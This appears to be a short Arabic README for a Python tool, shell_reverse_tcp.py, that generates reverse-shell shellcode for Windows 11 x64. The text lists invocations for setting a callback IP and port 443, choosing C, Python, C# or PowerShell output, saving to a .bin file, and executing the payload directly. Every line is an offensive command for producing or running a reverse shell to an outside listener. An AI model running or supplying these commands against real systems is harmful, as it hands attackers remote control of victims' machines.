
شيلكودات لنظام ويندوز 11 x64 فما فوق
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443
اللغة الافتراضية هي shellcode بلغة C، وكذلك Python و Csharp و powershell:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell
لحفظ الملف:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true
الإخراج الافتراضي هو output.bin:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin
للاختبار والتنفيذ:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true
وأيضًا:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin